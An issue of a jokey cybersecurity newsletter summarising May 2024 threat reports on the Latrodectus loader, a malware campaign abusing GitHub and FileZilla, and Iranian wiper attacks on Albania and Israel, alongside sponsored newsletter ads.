Surge in Latrodectus Malware Campaigns

May 21 2024

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter that’s rolling like thunder, deep cyber-under πŸ™ƒ

Today’s hottest cybersecurity news stories:

  • 🧊 You’re as cold as IcedID, you're willing to Latrodectus πŸ‘Ύ

  • 🍸 Malware cocktail delivered via GitHub and FileZilla πŸ¦–

  • πŸ—ΊοΈ Albania, Israel targeted by MOIS-linked hackers baby πŸ‘¨β€πŸ’»

SupercaliLatrodectusxpialidocious πŸ˜‚πŸ˜‚πŸ˜‚

🚨 Spike in Latrodectus Malware Campaigns πŸš€πŸ“§

Cybersecurity researchers have observed a surge in email phishing campaigns since early March 2024, delivering a nascent malware loader named Latrodectus. This malware is believed to be the successor to the infamous IcedID malware.

Infection Chain πŸ”—πŸ•·οΈ

The campaigns typically use oversized JavaScript files that exploit WMI to invoke msiexec.exe, installing a remotely hosted MSI file from a WEBDAV share. Latrodectus, designed to deploy additional payloads like QakBot, DarkGate, and PikaBot, allows threat actors to conduct various post-exploitation activities.

Advanced Features πŸ› οΈπŸ”’

Latrodectus boasts several sophisticated features:

  • Enumeration and execution capabilities

  • Self-delete technique for erasing running files

  • Masquerades as legitimate software libraries

  • Obfuscates source code and performs anti-analysis checks to evade debugging and sandbox environments

  • Sets up persistence on Windows hosts using a scheduled task

  • Communicates with a C2 server over HTTPS for commands such as collecting system information, updating, restarting, and executing files

New Commands πŸ†•πŸ“

Recent updates include commands to enumerate files in the desktop directory and retrieve the entire running process ancestry from infected machines. Although designed to download and execute IcedID, this behaviour hasn't been detected in the wild.

Potential Successor to IcedID πŸ€”πŸ”„

Researchers hypothesise that Latrodectus might be developed as a replacement for IcedID, given their development connections and similar functionalities.

Other Phishing Campaigns πŸŽ£πŸ’Ό

In addition to Latrodectus, other notable phishing campaigns have been observed:

DarkGate Malware: Using QuickBooks invoice-themed emails, phishing campaigns lead users to a malicious JAR file, executing a PowerShell script to download and launch DarkGate via an AutoIT script.

Phishing-as-a-Service (PhaaS): An updated platform called Tycoon targets Microsoft 365 and Gmail session cookies, bypassing MFA protections with enhanced detection evasion techniques.

D3F@ck Loader: Propagated through Google ads impersonating Calendly and Rufus, this loader drops Raccoon Stealer and DanaBot. It illustrates the evolving MaaS landscape, utilizing Extended Validation certificates to bypass trusted security measures.

Emerging Threats πŸ•΅οΈβ€β™‚οΈπŸ”

New stealer malware families like Fletchen Stealer, WaveStealer, zEus Stealer, and Ziraat Stealer are also on the rise. The Remcos RAT has been spotted using a PrivateLoader module to enhance its capabilities, employing VB scripts, altering the registry, and setting up services to remain undetected.

Conclusion πŸ”’πŸš«

The spike in Latrodectus campaigns and other phishing threats underscores the ever-evolving landscape of cyber threats. Organisations must stay vigilant, employ robust security measures, and educate users on phishing risks to mitigate these sophisticated attacks.

The Thrilla in FileZilla πŸ₯ŠπŸ₯ŠπŸ₯Š

🚨 Multi-Faceted Campaign Abuses Legitimate Services πŸš€πŸ›‘οΈ

A sophisticated campaign has been observed leveraging legitimate services like GitHub and FileZilla to distribute a variety of stealer malware and banking trojans, including Atomic (aka AMOS), Vidar, Lumma (aka LummaC2), and Octo. The malware is disguised as credible software such as 1Password, Bartender 5, and Pixelmator Pro.

Broad Targeting Strategy πŸŒπŸ’»

Recorded Future's Insikt Group, tracking the activity under the moniker GitCaught, notes that the presence of multiple malware variants indicates a broad cross-platform targeting strategy. The use of overlapping C2 infrastructure suggests a centralised command setup, enhancing the efficiency of the attacks.

Attack Chains πŸ”—πŸ“‚

Attackers use fake profiles and repositories on GitHub to host counterfeit versions of popular software. These malicious files are embedded within various domains and distributed via malvertising and SEO poisoning campaigns.

Malware Management πŸ—‚οΈπŸ”

The threat actors, suspected to be Russian-speaking from the Commonwealth of Independent States (CIS), also utilise FileZilla servers for managing and delivering malware. Analysis reveals that the campaign, active since at least August 2023, aims to deliver malware such as RedLine, Lumma, Raccoon, Vidar, Rhadamanthys, DanaBot, and DarkComet RAT.

Rhadamanthys Pathway πŸšͺ🎣

Victims who visit fake application websites are redirected to payloads hosted on Bitbucket and Dropbox, indicating a wider abuse of legitimate services.

Ongoing Threats ⚠️🍏

Microsoft's Threat Intelligence team has highlighted the ongoing threat of the macOS backdoor codenamed Activator. Distributed via disk image files impersonating cracked software, Activator steals data from Exodus and Bitcoin-Qt wallet applications. It prompts users for elevated privileges, disables macOS Gatekeeper and Notification Center, and deploys malicious Python scripts for persistence.

Key Points πŸ”‘

Campaign Name: GitCaught

Malware Variants: Atomic (AMOS), Vidar, Lumma (LummaC2), Octo, RedLine, Raccoon, Rhadamanthys, DanaBot, DarkComet RAT

Distribution Methods: Fake GitHub profiles, malvertising, SEO poisoning, Bitbucket, Dropbox

Target Platforms: Android, macOS, Windows

Threat Actors: Suspected Russian-speaking from CIS

Conclusion πŸ”’πŸš«

This campaign underscores the growing trend of cybercriminals misusing legitimate services to orchestrate attacks. Organisations and individuals must remain vigilant, employing robust cybersecurity measures to protect against these sophisticated threats.

🎣 Catch of the Day!! 🌊🐟🦞

Stay ahead of the curve with Presspool.ai! πŸš€ Subscribe to their newsletter for the latest buzz in the information technology space, with a special focus on AI. Their slogan says it all: "Actionable marketing insights for the visionary AI executive." πŸ€“πŸ’‘ That’s us, alright! 🀡 How about you? Visionary AI executive, much? πŸ‘€

And if the newsletter gets your motor running then you can take a butchers at their cool AI marketing product too which is sure to help you make the most of our new artificial overlords and put them to work for your business πŸ€–πŸ‘©β€πŸ’»πŸŒ

Rest assured, the process is very straightforward.

You simply:

πŸ†• Sign Up & Create Campaign

πŸ“Š Define your audience, budget, and message to captivate your audience.

πŸš€ Launch your campaign, as Presspool’s AI matches it with ideal newsletter audiences for optimal reach and conversions. 🎯

πŸ•΅οΈ Finally, you leverage real-time analytics to track performance and refine future strategies. πŸ“ˆ Elevate your marketing game and stay informed with Presspool.ai! 🌟 Simples! 🦦

Presspool.aiΒ πŸ“°πŸŠπŸ€– may just have what you need to succeed. And if the product isn’t for you, the newsletter alone is a gamechanger. And we know newsletters πŸ˜‰

You make me MOIS πŸ’€πŸ’€πŸ’€

🚨 Iranian Threat Actor Targets Albania and Israel πŸ’»πŸŒ

Actor affiliated with the Ministry of Intelligence and Security (MOIS) has been attributed to destructive wiping attacks targeting Albania and Israel. The campaigns are conducted under the personas Homeland Justice and Karma, respectively.

Threat Group βš”οΈπŸŽ―

Cybersecurity firm Check Point tracks this activity under the name Void Manticore, also known as Storm-0842 by Microsoft. The group shows significant overlap with another Iranian group, Scarred Manticore (aka Storm-0861).

Attack Patterns πŸ“ˆπŸ’₯

Void Manticore is known for:

  • Albania (since July 2022): Homeland Justice campaigns utilising bespoke wiper malware like Cl Wiper and No-Justice (LowEraser).

  • Israel (post-October 2023): Following the Israel-Hamas war, targeting Windows and Linux systems with wiper malware called BiBi, attributed to the pro-Hamas hacktivist group Karma.

Tactics and Techniques πŸ› οΈπŸ”“

The attack chains are straightforward, leveraging:

  • Publicly available tools

  • Remote Desktop Protocol (RDP)

  • Server Message Block (SMB)

  • File Transfer Protocol (FTP)

Initial access often exploits known vulnerabilities in internet-facing applications, such as CVE-2019-0604. Successful breaches are followed by the deployment of web shells, including Karma Shell, which masquerades as an error page while providing various malicious capabilities.

Collaboration Between Threat Groups πŸ€πŸ”—

Void Manticore appears to use access previously obtained by Scarred Manticore for its operations, suggesting a systematic handoff of targets. Microsoft’s investigations into attacks on

Albanian governments in 2022 indicated cooperation among multiple Iranian actors:

  • Storm-0861: Initial access and data exfiltration

  • Storm-0842: Ransomware and wiper malware deployment

  • Storm-0166: Further data exfiltration

  • Storm-0133: Probing victim infrastructure

  • Storm-0861 is linked to APT34 (Cobalt Gypsy, Hazel Sandstorm, Helix Kitten, OilRig), known for wiper malware like Shamoon and ZeroCleare.

Check Point’s Insights πŸ§ πŸ”

Check Point highlights that:

  • Techniques overlap in attacks against Israel and Albania, indicating routine coordination.

  • Void Manticore’s dual approach combines psychological warfare with data destruction, amplifying the impact on targeted organisations.

  • This ongoing cooperation and strategic coordination between Iranian cyber actors underscore the sophisticated nature of these campaigns.

πŸ—žοΈ Extra, Extra! Read all about it! πŸ—žοΈ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • πŸ›‘οΈ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday πŸ“…

  • πŸ’΅Β Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for πŸ†“

  • πŸ“ˆΒ Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future πŸ‘Ύ

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

Recent articles